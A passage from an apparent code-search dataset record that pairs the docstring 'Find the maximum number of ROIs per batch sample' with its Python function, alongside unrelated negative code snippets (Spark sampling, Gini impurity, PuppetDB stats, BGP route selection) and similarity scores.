1 and not self.pre_sampled:\n self.rdd = self.rdd.sample(False, self.sample, self.seed)\n\n # Assign each RDD with counter. Reduce and collect.\n collectedCounts = self.rdd.reduceByKey(lambda x,y: x+y) \\\n .collect() # (id, count), number of times that count appears)\n\n # function that re-calculates coverage based on sampling\n approximateCounts = lambda counts, sample: int(counts * 1.0/sample)\n\n # restructure each record so record structure is (key: sampleId, value: (coverage, count))\n x = list(map(lambda x: (x[0][0], (x[0][1], approximateCounts(x[1], self.sample))), collectedCounts))\n\n # create dictionary where keys are the sampleId\n self.collectedCounts = collections.defaultdict(set)\n for k, v in x:\n self.collectedCounts[k].add(v)", "def test_numpy_occupancy_compare(self):\n data = load_occupancy(return_dataset=True)\n X, y = data.to_numpy()\n\n _, _, y_train, y_test = tts(X, y, test_size=0.4, random_state=2242)\n\n # Create and fit the visualizer\n oz = ClassBalance()\n assert oz.fit(y_train, y_test) is oz\n\n # oz.finalize()\n self.assert_images_similar(oz, tol=0.5) # w/o tol fails with RMS 0.433", "def __run_instances(self, number=1, policies={}):\n try:\n self.euca = Euca2ool('k:n:t:g:d:f:z:',\n ['key=', 'kernel=', 'ramdisk=', 'instance-count=', 'instance-type=',\n 'group=', 'user-data=', 'user-data-file=', 'addressing=', 'availability-zone='])\n except Exception, ex:\n sys.exit(1)\n\n instance_type = policies.get('instance_type') or 'm1.small'\n image_id = policies.get('image_id') or self.__get_image_id()[0]\n min_count = number\n max_count = number\n keyname = 'mykey'\n \n kernel_id = None\n ramdisk_id = None\n group_names = []\n user_data = None\n addressing_type = None\n zone = None\n user_data = None\n \n if image_id:\n euca_conn = self.__make_connection()\n try:\n reservation = euca_conn.run_instances(image_id = image_id,\n min_count = min_count,\n max_count = max_count,\n key_name = keyname,\n security_groups = group_names,\n user_data = user_data,\n addressing_type = addressing_type,\n instance_type = instance_type,\n placement = zone,\n kernel_id = kernel_id,\n ramdisk_id = ramdisk_id)\n except Exception, ex:\n self.euca.display_error_and_exit('error:%s' % ex)\n return reservation\n return False", "def reconcile(self):\r\n\t\tclass_A = np.empty((self.basis.nK,self.basis.nK),float)\r\n\t\tclass_G = np.empty((self.basis.nK,self.basis.nK),float)\r\n\t\tclass_koop = np.empty((self.basis.nK,self.basis.nK),float)\r\n\t\tclass_num = len(self.koop_cluster_list)\r\n\t\tfor i in range(class_num):\r\n\t\t\tclass_mem_num = len(self.koop_cluster_list[i])\r\n\t\t\tclass_counter = 0.0\r\n\t\t\tfor j in range(class_mem_num):\r\n\t\t\t\tclass_A += (self.koop_cluster_list[i][j]._A*self.koop_cluster_memb_prob_list[i][j])/float(class_mem_num)\r\n\t\t\t\tclass_G += (self.koop_cluster_list[i][j]._G*self.koop_cluster_memb_prob_list[i][j])/float(class_mem_num)\r\n\t\t\t\tclass_counter += self.koop_cluster_list[i][j].counter\r\n\t\t\tclass_koop = np.dot(np.linalg.pinv(class_G),class_A)\r\n\t\t\tself.koopman_hybrid_modes.append(KoopmanOperator(self.basis, class_koop, class_A, class_G, class_counter))", "def balanced_sampling(dat: pd.DataFrame, logger=None):\n if logger == None:\n logging.basicConfig(\n level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n logger = logging.getLogger(__name__)\n \n \n # upsampling\n logger.info('Start balanced sampling')\n subsample = []\n num_of_each_class = dat.iloc[:, -1].value_counts().to_numpy()\n if num_of_each_class.std()*1.0 / num_of_each_class.mean() < 0.1:\n logger.info('The given data is balance.')\n # the dataset is balanced\n return dat\n logger.info('Given dataset is unbalance')\n logger.info('Sampling data from each class to generate a new dataset')\n n_smp = num_of_each_class.max()\n for label in dat.iloc[:, -1].value_counts().index:\n samples = dat[dat.iloc[:, -1] == label]\n num_samples = len(samples)\n index_range = range(num_samples)\n # take all from the set\n indexes = list(np.random.choice(index_range, size=num_samples, replace=False))\n indexes2 = list(np.random.choice(\n index_range, size=n_smp-num_samples, replace=True)) # add random items\n indexes.extend(indexes2)\n subsample.append(samples.iloc[indexes, :])\n logger.info('End with sampling')\n out = pd.concat(subsample)\n out = out.sample(frac=1).reset_index(drop=True) # shuffle and re index\n return out", "def do(self):\n from backend.modules.patient.models import Patient\n patients = Patient.objects.all()\n for patient in patients:\n self.service.rank_by_object(patient)", "def gini(self, rows):\n counts = self.class_counts(rows)\n impurity = 1\n for lbl in counts:\n prob_of_lbl = counts[lbl] / float(len(rows))\n impurity -= prob_of_lbl**2\n return impurity", "def classify():\n yes_dataset = df[df[\"_class\"] == 1] # 470588\n no_dataset = df[df[\"_class\"] == 0] # 1971\n\n parameter_analysis = list()\n for criterion in np.arange(0.05, 0.91, 0.05):\n print(\"doing experiment at criterion = %s ...\" % criterion)\n rate_list = list()\n for i in range(10):\n # shuffle yes_dataset and no_dataset, so we can randomly choose 90% yes_dataset\n # + 90% no_dataset as train dataset, 10% yes_dataset + 10% no_dataset as test dataset\n yes_index = yes_dataset.index.tolist()\n random.shuffle(yes_index)\n no_index = no_dataset.index.tolist()\n random.shuffle(no_index)\n \n # concatenate 90%yes + 90%no, 10%yes + 10%no\n train = pd.concat([\n yes_dataset.loc[yes_index[:1774], :],\n no_dataset.loc[no_index[:423530], :]\n ])\n test = pd.concat([\n yes_dataset.loc[yes_index[1774:], :],\n no_dataset.loc[no_index[423530:], :]\n ]) \n \n # split data and label\n train_data, train_label = (train[[\"Revenue.Code\", \n \"Service.Code\", \n \"Procedure.Code\", \n \"Diagnosis.Code\", \n \"Subscriber.Index\"]], \n train[\"_class\"])\n test_data, test_label = (test[[\"Revenue.Code\", \n \"Service.Code\", \n \"Procedure.Code\", \n \"Diagnosis.Code\", \n \"Subscriber.Index\"]], \n test[\"_class\"])\n \n # apply classifier\n clf = GaussianNB()\n clf.fit(train_data, train_label)\n probability = clf.predict_proba(test_data).T[1]\n \n result = pd.DataFrame()\n result[\"_class\"] = test_label\n result[\"_predict\"] = probability >= criterion\n \n result_yes = result[result[\"_class\"] == 1]\n yes_yes_rate = sum(result_yes[\"_class\"] == result_yes[\"_predict\"])/len(result_yes[\"_predict\"])\n \n result_no = result[result[\"_class\"] == 0]\n no_no_rate = sum(result_no[\"_class\"] == result_no[\"_predict\"])/len(result_no[\"_predict\"])\n \n rate_list.append((yes_yes_rate, no_no_rate))\n\n rate_list = pd.DataFrame(rate_list)\n yes_yes_rate, no_no_rate = rate_list.mean()[0], rate_list.mean()[1]\n parameter_analysis.append((criterion, yes_yes_rate, no_no_rate))\n \n # save data to excel spreadsheet\n parameter_analysis = pd.DataFrame(parameter_analysis, columns=[\"criterion\", \"yes_yes_rate\", \"no_no_rate\"])\n writer = pd.ExcelWriter(\"parameter_analysis.xlsx\")\n parameter_analysis.to_excel(writer, \"parameter_analysis\", index=False)\n writer.save()", "def oracle(dataset: Dataset, conf: Namespace) -> np.ndarray:\n # Copy dataframe and set up test and score columns\n df = dataset.df.copy()\n df['test'] = df['fold'] == dataset.fold\n df['score'] = df[dataset.feature]\n\n # Compute calibrated score here, start as zeros\n calibrated_score = np.zeros_like(df['score'], dtype='float')\n\n # Get each combination of sensitive attributes (in this case only consider ethnicity)\n print(\"Computing results for subgroups...\")\n for subgroup in dataset.iterate_subgroups():\n\n # Set up select mask for left and right image, initialize as all True\n select = np.full_like(calibrated_score, True, dtype=bool) # TODO this can be cleaner\n\n # Iterate attributes of subgroup\n for attribute in subgroup:\n\n # Get columns of current attribute, is always only 2 (for left and right image)\n for col in dataset.consts['sensitive_attributes'][attribute]['cols']:\n # Update masks for both images of current attribute value\n select &= (df[col] == subgroup[attribute])\n\n # Mask to select the train data of the above select\n select_train = select & (df['test'] == False)\n\n # Set up calibrator on train set of current subgroup\n calibrator = BetaCalibration(df['score'][select_train], df['same'][select_train], score_min=-1, score_max=1)\n\n # Use calibrator on all data\n calibrated_score[select] = calibrator.predict(df['score'][select])\n\n return calibrated_score", "def get_all_bw_counters(self, instances):\n bw = []\n return bw", "def radiator(env):\n envs = environments()\n check_env(env, envs)\n\n if env == '*':\n query_type = ''\n if get_db_version(puppetdb) < (4, 0, 0):\n query_type = 'type=default,'\n query = None\n metrics = get_or_abort(\n puppetdb.metric,\n 'puppetlabs.puppetdb.population:%sname=num-nodes' % query_type)\n num_nodes = metrics['Value']\n else:\n query = AndOperator()\n metric_query = ExtractOperator()\n\n query.add(EqualsOperator(\"catalog_environment\", env))\n query.add(EqualsOperator(\"facts_environment\", env))\n metric_query.add_field(FunctionOperator('count'))\n metric_query.add_query(query)\n\n metrics = get_or_abort(\n puppetdb._query,\n 'nodes',\n query=metric_query)\n num_nodes = metrics[0]['count']\n\n nodes = puppetdb.nodes(\n query=query,\n unreported=app.config['UNRESPONSIVE_HOURS'],\n with_status=True\n )\n\n stats = {\n 'changed_percent': 0,\n 'changed': 0,\n 'failed_percent': 0,\n 'failed': 0,\n 'noop_percent': 0,\n 'noop': 0,\n 'skipped_percent': 0,\n 'skipped': 0,\n 'unchanged_percent': 0,\n 'unchanged': 0,\n 'unreported_percent': 0,\n 'unreported': 0,\n }\n\n for node in nodes:\n if node.status == 'unreported':\n stats['unreported'] += 1\n elif node.status == 'changed':\n stats['changed'] += 1\n elif node.status == 'failed':\n stats['failed'] += 1\n elif node.status == 'noop':\n stats['noop'] += 1\n elif node.status == 'skipped':\n stats['skipped'] += 1\n else:\n stats['unchanged'] += 1\n\n try:\n stats['changed_percent'] = int(100 * (stats['changed'] /\n float(num_nodes)))\n stats['failed_percent'] = int(100 * stats['failed'] / float(num_nodes))\n stats['noop_percent'] = int(100 * stats['noop'] / float(num_nodes))\n stats['skipped_percent'] = int(100 * (stats['skipped'] /\n float(num_nodes)))\n stats['unchanged_percent'] = int(100 * (stats['unchanged'] /\n float(num_nodes)))\n stats['unreported_percent'] = int(100 * (stats['unreported'] /\n float(num_nodes)))\n except ZeroDivisionError:\n stats['changed_percent'] = 0\n stats['failed_percent'] = 0\n stats['noop_percent'] = 0\n stats['skipped_percent'] = 0\n stats['unchanged_percent'] = 0\n stats['unreported_percent'] = 0\n\n if ('Accept' in request.headers and\n request.headers[\"Accept\"] == 'application/json'):\n return jsonify(**stats)\n\n return render_template(\n 'radiator.html',\n stats=stats,\n total=num_nodes\n )", "def __test_load_imbalance(L, S, A, R, Y):\n return load_imbalance(Y,L,A)", "def __iteratively_retain(\n self,\n orf_regions: List[Tuple[int, int]]) -> List[Tuple[int, int]]:\n\n ret = []\n\n arr = np.zeros((len(self.seq), ))\n\n for start, end in orf_regions:\n ret.append((start, end))\n arr[start-1:end] = 1\n orf_coverage = np.sum(arr) / len(arr)\n if orf_coverage > self.min_orf_coverage:\n break\n\n return ret", "def gini(rows):\n counts = class_counts(rows)\n print(counts)\n impurity = 1\n for lbl in counts:\n prob_of_lbl = counts[lbl] / float(len(rows))\n impurity -= prob_of_lbl**2\n return impurity", "def CrossCheck(dataloader):", "def prune(i):\n\n return {'return':1, 'error':'pruning is not yet supported in this scenario'}", "def decision_process(self) -> None:\n # order routes by preference\n self.adj_rib_in.preference_ordering()\n # for each route insert the best in the loc_rib\n for destination in self.adj_rib_in:\n best_route = destination[0]\n # if there as been a change insert the new route in the adj-rib-out\n old_best = None\n if self.loc_rib.exists(best_route):\n old_best = self.loc_rib[best_route]\n if self.loc_rib.insert(best_route) is not None:\n for neigh in self.nodes_rib_out:\n # Case 1, the RIB out doesn't contains a route for the destination\n if not self.nodes_rib_out[neigh].exists(best_route):\n # Insert the new best as an Advertisement\n self.nodes_rib_out[neigh].insert(best_route)\n # If the Old best is not none insert it as a withdraw\n if old_best is not None and \\\n not self.nodes_rib_out[neigh].exists_withdraws(best_route):\n self.nodes_rib_out[neigh].insert_withdraw(old_best)\n # Case 2, The Rib contains a Route for the detination\n else:\n # Remove the route from the advertisements\n self.nodes_rib_out[neigh].remove(old_best)\n if len(self.nodes_rib_out[neigh][old_best]) == 0:\n del self.nodes_rib_out[neigh][old_best]\n # If the route in the withdraws is equal to the new best don't do anything\n # Otherwise insert the new route as an advertisement\n if self.nodes_rib_out[neigh].exists_withdraws(best_route) and \\\n best_route in self.nodes_rib_out[neigh].get_withdraws(best_route):\n self.nodes_rib_out[neigh].remove_from_withdraws(best_route)\n else:\n self.nodes_rib_out[neigh].insert(best_route)\n # Evaluation if something has to be removed from the LOC rib and withdrawd\n for destination in self.loc_rib:\n if not self.adj_rib_in.exists(destination):\n del self.loc_rib[destination]\n for neigh in self.nodes_rib_out:\n # if self.nodes_rib_out[neigh].exists(destination):\n # del self.nodes_rib_out[neigh][destination]\n self.nodes_rib_out[neigh].insert_withdraw(destination)", "def _balances(self) -> Dict[str, int]:\n\n return self.client.get(self._resources(\"balance\"))", "def compute_statistics(self):" ]
[ "0.57167405", "0.570118", "0.5557484", "0.5479032", "0.5437137", "0.5420406", "0.5420168", "0.5331262", "0.53278494", "0.5277977", "0.5214856", "0.5206903", "0.51943547", "0.5191577", "0.5144731", "0.5080557", "0.5061859", "0.5055446", "0.5047951", "0.5047951", "0.502992", "0.5025928", "0.49741614", "0.49303448", "0.49277928", "0.49232578", "0.49193674", "0.4907208", "0.4899866", "0.48954886", "0.48924613", "0.48702243", "0.48653147", "0.48489785", "0.48396292", "0.48393363", "0.4834783", "0.4826847", "0.48255596", "0.48176247", "0.48126063", "0.48089144", "0.48035535", "0.47978997", "0.47703955", "0.4763296", "0.47458494", "0.4743917", "0.4737341", "0.47366825", "0.4734417", "0.47166786", "0.47104606", "0.4709417", "0.46933106", "0.46927994", "0.4689279", "0.4686827", "0.46829695", "0.4681995", "0.46799555", "0.46763563", "0.46744087", "0.4670964", "0.46709582", "0.46629134", "0.46616676", "0.46498147", "0.46453664", "0.46368378", "0.4628084", "0.46243814", "0.46167213", "0.46124583", "0.4609811", "0.46072188", "0.46010727", "0.46003428", "0.45990217", "0.45978084", "0.4596454", "0.45944893", "0.45922345", "0.45919055", "0.45880502", "0.4587742", "0.45872673", "0.45869914", "0.4586496", "0.4582051", "0.45761833", "0.4570396", "0.45698726", "0.45689407", "0.4562313", "0.45586032", "0.45541", "0.45540938", "0.45537484", "0.45528427" ]
0.527201
10
Find the maximum number of ROIs per batch sample in the dataset
def get_max_rois(self): maxsize = 0 for index in self.SampleID: rois = self.__getrois__(index); maxsize = max(maxsize, rois.shape[0]) return maxsize
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __len__(self):\n return int(np.ceil(self.max_index / float(self.batch_size)))", "def max_num_batches(self):\n return self._max_num_batches", "def max_individuals(self) -> int:\n return self.group_size.upper * self.groups_allowed", "def __len__(self):\n return int(np.ceil(len(self.ids) / self.batch_size))", "def get_max_rows_per_partition() -> int:\n pass", "def __len__(self):\n return int(np.floor(len(self.dataset_df) / self.batch_size))", "def ExpectedMaxBatchSizes(self, run_params):\n return self.max_batch_sizes", "def __len__(self):\n return int(np.floor(len(self.ids) / self.batch_size))", "def batch_size(self):\n if self._batch_size is not None:\n return self._batch_size # custom batch size defined\n if self.task == 'objdet':\n return 8\n annos_per_img = self._annos_per_img[self.dataset]\n if self.task in {'predcls', 'sgcls'}:\n annos_per_img = annos_per_img['pairs']\n elif self.task == 'objcls':\n annos_per_img = annos_per_img['objects']\n elif self.task == 'preddet' and self.filter_multiple_preds:\n annos_per_img = annos_per_img['predicates_filtered']\n elif self.task == 'preddet' and self.filter_duplicate_rels:\n annos_per_img = annos_per_img['duplicates_filtered']\n elif self.task in {'preddet', 'sggen'}:\n annos_per_img = annos_per_img['relations']\n batch_size = ceil(self._annotations_per_batch / annos_per_img)\n return max(batch_size, 2)", "def num_of_cancerous_pixels(batch, max_num=10):\n stats = dict()\n n_print = min(max_num, len(batch))\n for i in range(n_print):\n stats.update({'Scan ' + str(i): int(np.sum(batch.get(i, 'masks')))})\n\n stats = {'Number of cancerous pixels: ': stats}\n stats_df = pd.DataFrame.from_dict(stats, orient='index').loc[:, ['Scan '+ str(i) for i in range(n_print)]]\n return stats_df", "def max_counts(self):\n\n return np.nanmax(self.pre_proc_data)", "def batch_size(self) -> int:\n ...", "def get_num_batches(self,batch_size):\r\n \r\n return len(self) // batch_size", "def __len__(self):\n return int(np.ceil(self.total_frame_count / self.batch_size))", "def maximum_count(self) -> pulumi.Input[int]:\n return pulumi.get(self, \"maximum_count\")", "def load_max(self):\n return max(self.load_samples)", "def __len__(self):\n gen_len = len(self.image_ids) // self.batch_size\n if len(self.image_ids) % self.batch_size != 0:\n gen_len += 1\n return gen_len", "def getEpochCount(rawStimData, epochColumn=3):\n # get the max epoch count from the rawStimData\n # 4th column is the epoch number\n # add plus 1 since the min epoch no is zero\n \n # BG edit: Changed the previous epoch extraction, which uses the maximum \n # number + 1 as the epoch number, to a one finding the unique values and \n # taking the length of it\n epochCount = np.shape(np.unique(rawStimData[:, epochColumn]))[0]\n print(\"Number of epochs = \" + str(epochCount))\n\n return epochCount", "def __len__(self):\n return math.ceil(self.number_of_images / self.batch_size)", "def _min_sampled_from_batch(self):\n return min([col._last_batch_size for col in self._profile], default=0)", "def get_max_run(run):\n max = 0\n max_i = 0\n for i in range(800, 900):\n if int(run[i]) > int(max):\n max = run[i]\n max_i = i\n return max, max_i", "def find_max_nr_doc(data):\n queries = list(set(data[:, 1].astype(int)))\n max_nr = 0\n for query in queries:\n n_max = data[data[:,1] == query].shape[0]\n if n_max > max_nr:\n max_nr = n_max\n return max_nr", "def max_size(self):\n sizes = np.array([m.sum() for m in self.masks])\n return sizes.max()", "def get_max_readings( self ):\n return 2500", "def _update_num_batches(self):\n # maximum possible number of batches is equal to number of whole times\n # batch_size divides in to the number of data points which can be\n # found using integer division\n possible_num_batches = self.inputs.shape[0] // self.batch_size\n if self.max_num_batches == -1:\n self.num_batches = possible_num_batches\n else:\n self.num_batches = min(self.max_num_batches, possible_num_batches)", "def ram_max(self):\n return max(self.ram_samples)", "def max(self):\r\n\t\treturn max(self.sample)", "def recommended_max_num_datapoints(self) -> int:\n # very large number, essentially no limit by default\n return 1e9", "def _get_max_answers(self):\n return max([len(x) for x in self.labels])", "def _max_col_samples_used(self):\n samples_used = 0\n for col in self._profile:\n samples_used = max(samples_used, col.sample_size)\n return samples_used", "def __len__(self):\n return int(np.ceil(len(self.image_filenames) / (self.batch_size)))", "def batch_size(self):\n self.validate_shape_and_dtype()\n return self.rgb.shape[0]", "def n_samples(self) -> int: # pragma: no cover\n return self.samples.shape[0]", "def max_scoring_num_rolls(dice=six_sided, num_samples=1000):\n # BEGIN PROBLEM 8\n\n \"\"\"maxi, number_of_dice, ret = 0, 10, 0\n while number_of_dice > 0:\n avg = make_averaged(roll_dice)(number_of_dice, dice)\n maxi = max(maxi, avg)\n if avg >= maxi:\n ret = number_of_dice\n number_of_dice -= 1\n return ret\"\"\"\n\n\n\n counterA = 1\n num_rolls=1\n max_value = 0\n best_num_rolls = 0\n while counterA <= 10:\n num_rolls = counterA\n average_function = make_averaged(roll_dice)(counterA, dice)\n if average_function > max_value:\n max_value = average_function\n best_num_rolls = counterA\n counterA +=1\n return best_num_rolls\n\n \"\"\"counterA = 1\n maxvalue = 0\n maxvaluenumber = 0\n while(counterA<=10):\n num_rolls = counterA\n average_for_roll = make_averaged(roll_dice(num_rolls, dice), num_samples)\n counterB = average_for_roll(roll_dice(counterA, dice))\n if(counterB>maxvalue):\n maxvalue = counterB\n maxvaluenumber = counterA\n counterA +=1\n return maxvaluenumber\"\"\"\n # END PROBLEM 8", "def max_scoring_num_rolls(dice=six_sided, num_samples=1000):\n # BEGIN PROBLEM 9\n \"*** YOUR CODE HERE ***\"\n k, max_value, max_num = 1, 0, 0\n roll = make_averaged(roll_dice, num_samples)\n while k <= 10:\n current_value = roll(k, dice)\n #print('k: ' + str(k) + ' current_value: ' + str(current_value))\n if current_value > max_value:\n max_value, max_num = current_value, k\n k += 1\n return max_num\n # END PROBLEM 9", "def get_max_batch_size(model, tile_size, device, classes):\n\n # get number of trainable parameters\n total_param = 0\n for name, param in model.named_parameters():\n if param.requires_grad:\n num_param = np.prod(param.size())\n total_param += num_param\n \n # get available GPU memory\n gpu_stats = gpustat.GPUStatCollection.new_query()\n item = gpu_stats.jsonify()[\"gpus\"][device]\n gpu_mem = (item[\"memory.total\"] - item[\"memory.used\"])*1E6*1.04858\n\n # max batch size\n max_batch_size = int(gpu_mem/(8*classes*(total_param+tile_size*tile_size))) - 1\n if max_batch_size < 1:\n max_batch_size = 1\n return max_batch_size", "def get_number_samples(self):\n return self.samples.shape[0]", "def _number_of_samples(self):\n return len(self._raw_data.samples)", "def get_max_size(self):\n max_size = 0\n file = h5py.File(self.filename, 'r')\n for idx in range(len(self)):\n label = self.labels[idx]\n timestamps_group = file['/'][self.mode + '_timestamps']\n timestamps_dset = timestamps_group[label]\n size = len(timestamps_dset)\n if size > max_size: max_size = size\n file.close()\n return max_size\n\n # max_size = 0\n # for i in range(len(self)):\n # item = self[i][0]\n # if len(item) > max_size:\n # max_size = len(item)\n # return max_size", "def batch_size(self):\n return self._first_rgb.shape[0]", "def batch_len(batch):\n flatlist, _ = tree_util.tree_flatten(batch)\n if len(flatlist) < 1:\n return 0\n b = flatlist[0].shape[0]\n assert all(\n arr.shape[0] == b for arr in flatlist if th.is_tensor(arr)\n ), \"Not all arrays have same batchsize!\"\n return b", "def n_rounds(self) -> int:\n return self.y.shape[0]", "def get_last_number_of_samples(self):\n return mpi.globNumSamples", "def number_of_batches(self):\n return int(np.floor(len(self.file_paths_list) / self.batch_size))", "def __len__(self) -> int:\n return int(np.floor(len(self.list_IDs) / self.batch_size))", "def maxContigLength(self):\n\t\tstats = self.scores()\n\t\treturn stats['largestContig']", "def get_max_num_runs(self, db):\n res = db.session.query(func.max(db.ExperimentResult.run)).filter_by(experiment=self).first()\n if res is None or res[0] is None: return 0\n return res[0] + 1", "def batch_size(features, labels):\n return extract_batch_length(features)", "def get_batch_size():\n return get_global_variable(GraphKeys.BATCH_SIZE)", "def n_train(self):\n return self.factors[0].shape[0]", "def get_evaluation_batch_size():\n return 1", "def get_max_depth_val():\n data = SUNRGBDTrainDataset(True)\n return max([data[0][i][-1].flatten().item() for i in range(len(data))])", "def __len__(self):\n if not self.opt.union:\n return min(len(self.dataset), self.opt.max_dataset_size)\n else:\n return len(self.batch_sampler)", "def __len__(self):\r\n return int(np.floor(len(self.list_IDs) / self.batch_size))", "def batch_size(self):\n return self.size", "def max_mireds(self):\n return 333", "def size(self, batch):\n x,y,m = batch \n return sum([mm.sum() for mm in m])", "def max_level(data: np.ndarray) -> int:\n shape = data.shape[1:] # exclude channel dimension\n return min(shape).bit_length() - 1", "def max_count(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"max_count\")", "def max_count(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"max_count\")", "def max_count(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"max_count\")", "def max_count(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"max_count\")", "def max_count(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"max_count\")", "def __len__(self):\n return int(np.floor(len(self.list_ids) / self.batch_size))", "def max_scoring_num_rolls(dice=six_sided, num_samples=1000):\n # BEGIN PROBLEM 9\n averaged_dice = make_averaged(roll_dice, num_samples)\n max_score = 0\n result = 0\n for num_rolls in range(1, 11):\n average_turn_score = averaged_dice(num_rolls, dice)\n if average_turn_score > max_score:\n max_score = average_turn_score\n result = num_rolls\n elif average_turn_score == max_score: # if tied, lower num rolls\n if num_rolls < result:\n max_score = average_turn_score\n result = num_rolls\n return result\n # END PROBLEM 9", "def __len__(self):\n nsamp = self.data.shape[-1]\n kernel = int(self.kernel * self.fs)\n stride = int(self.stride * self.fs)\n n_stride = int(np.ceil((nsamp - kernel) / stride) + 1)\n return max(0, n_stride)", "def batch_size(self) -> pulumi.Output[Optional[int]]:\n return pulumi.get(self, \"batch_size\")", "def __len__(self):\n return int(np.floor(len(self.list_IDs) / self.batch_size))", "def __len__(self):\n return int(np.floor(len(self.list_IDs) / self.batch_size))", "def __len__(self):\n return int(np.floor(len(self.list_IDs) / self.batch_size))", "def max_obj_dets_per_img(self):\n return min(64, self._annos_per_img[self.dataset]['max_objects'])", "def __len__(self):\n return self.limit_batches", "def take_max_rwr(rwr_walks):\n max_rwr = []\n for rwr in rwr_walks:\n if len(rwr) > len(max_rwr):\n max_rwr = rwr\n else:\n pass\n image_numb = len(max_rwr)\n\n return max_rwr, image_numb", "def _max_periods(self):\n return self.data.shape[0]", "def get_max_iters():\n return 2000", "def __len__(self) -> int:\n num_batches, remainder = divmod(len(self.mapped_triples), self.batch_size)\n if remainder and not self.drop_last:\n num_batches += 1\n return num_batches", "def max_batchwise(data_source, batch_size=1024):\n max_val = np.zeros(data_source.dshape, dtype=np.float32)\n\n for x, _ in iterate_batches(data_source, batch_size, expand=True):\n max_val = np.maximum(max_val, np.abs(x).max(axis=0))\n\n return max_val", "def node_count_max(self) -> int:\n return int(self.graph_tuple_stats.node_count_max or 0)", "def __len__(self):\n return math.ceil(len(self._sampler) / self._batch_size)", "def get_max_feat_id(self):\n total_nb = 0\n try:\n with open(os.path.join(self.base_update_path,self.master_update_file),'rt') as master_file:\n # sum up sizes of files in master_file\n for line in master_file:\n statinfo = os.stat(os.path.join(self.hashing_outpath,line.strip()+'_itq_norm_'+str(self.bits_num)))\n total_nb += statinfo.st_size*8/self.bits_num\n except Exception as inst:\n print \"[HasherSwig.get_max_feat_id: error] {}\".format(inst)\n return total_nb", "def max_mireds(self) -> int:\n return MIREDS_MAX", "def test_max_number_of_records(self):\n self._config['Number of examples'] = '2'\n result = self._gen.generate(\n example=self._example,\n model=self._model,\n dataset=self._dataset,\n config=self._config)\n self.assertLen(result, 2)", "def getMaxMancount(self):\n return self.__size * 20", "def count_max(alon):\n return count_max_acc(alon, alon[0], 0, 0)", "def get_max_preds(batch_heatmaps):\n assert isinstance(batch_heatmaps, np.ndarray), \\\n 'batch_heatmaps should be numpy.ndarray'\n assert batch_heatmaps.ndim == 4, 'batch_images should be 4-ndim'\n batch_size = batch_heatmaps.shape[0]\n num_joints = batch_heatmaps.shape[1]\n width = batch_heatmaps.shape[3]\n heatmaps_reshaped = batch_heatmaps.reshape((batch_size, num_joints, -1))\n idx = np.argmax(heatmaps_reshaped, 2)\n maxvals = np.amax(heatmaps_reshaped, 2)\n maxvals = maxvals.reshape((batch_size, num_joints, 1))\n idx = idx.reshape((batch_size, num_joints, 1))\n preds = np.tile(idx, (1, 1, 2)).astype(np.float32)\n preds[:, :, 0] = (preds[:, :, 0]) % width\n preds[:, :, 1] = np.floor((preds[:, :, 1]) / width)\n pred_mask = np.tile(np.greater(maxvals, 0.0), (1, 1, 2))\n pred_mask = pred_mask.astype(np.float32)\n preds *= pred_mask\n return preds, maxvals", "def __len__(self):\n return int(np.floor(len(self.indexes) / self.batch_size))", "def __len__(self):\n return int(np.floor(len(self.indexes) / self.batch_size))", "def __len__(self):\n return int(np.floor(len(self.indexes) / self.batch_size))", "def data_edge_count_max(self) -> int:\n return int(self.graph_tuple_stats.data_edge_count_max or 0)", "def max_noutput_items(self) -> \"int\":\n return _beamforming_swig.randomsampler_sptr_max_noutput_items(self)", "def __len__(self):\n if self.batch_size == 1:\n return len(self.index_list)\n else:\n return max(1, len(self.index_list)//self.batch_size)", "def __len__(self):\n return max(self.A_size, self.B50_size, self.B100_size, self.B150_size)", "def n_valid_rows(n, X):\n if n > X.shape[0]:\n return X.shape[0]\n return n", "def __len__(self):\n\n return math.ceil(len(self.img_files) * self.gen_count / self.batch_size)", "def max_count(self):\n return self.config.get('max_count', 500)", "def batch_size(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"batch_size\")", "def max_instance_count(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"max_instance_count\")", "def max_instance_count(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"max_instance_count\")", "def num_examples_per_epoch(self):\n\t\tif self.subset == 'train':\n\t\t\treturn 50000\n\t\tif self.subset == 'validation':\n\t\t\treturn 10000", "def num_training_examples(self):" ]
[ "0.6792534", "0.659393", "0.65083873", "0.64983654", "0.6442182", "0.6357087", "0.6351913", "0.63443124", "0.6337801", "0.630785", "0.62681437", "0.6250322", "0.6208346", "0.6205874", "0.616179", "0.61612123", "0.6137554", "0.6132003", "0.612465", "0.6107981", "0.61064506", "0.61027664", "0.60993475", "0.6096231", "0.6074781", "0.60655445", "0.60606486", "0.6056908", "0.604342", "0.6014732", "0.6010511", "0.600997", "0.6006281", "0.5998703", "0.59957033", "0.59928393", "0.59927994", "0.5976023", "0.5968626", "0.5965454", "0.5961322", "0.5942122", "0.59295017", "0.59208804", "0.59197223", "0.59085155", "0.59064686", "0.5904791", "0.5885887", "0.5882013", "0.58777356", "0.58748233", "0.5872975", "0.5869496", "0.5869161", "0.5866166", "0.5866114", "0.5863786", "0.58560616", "0.58560616", "0.58560616", "0.58560616", "0.58560616", "0.585352", "0.58518267", "0.5847155", "0.5845512", "0.5839108", "0.5839108", "0.5839108", "0.5829433", "0.58232826", "0.5820333", "0.5820227", "0.5818449", "0.5818156", "0.580663", "0.5777787", "0.57775766", "0.57706046", "0.5769276", "0.57683706", "0.5761545", "0.5740511", "0.5739504", "0.57370645", "0.57370645", "0.57370645", "0.5728256", "0.57273537", "0.5727335", "0.57202804", "0.5715721", "0.5715228", "0.57071614", "0.569941", "0.56920797", "0.56920797", "0.5685712", "0.56839347" ]
0.78903097
0
Worker Initialization Function for parallel batch loading.
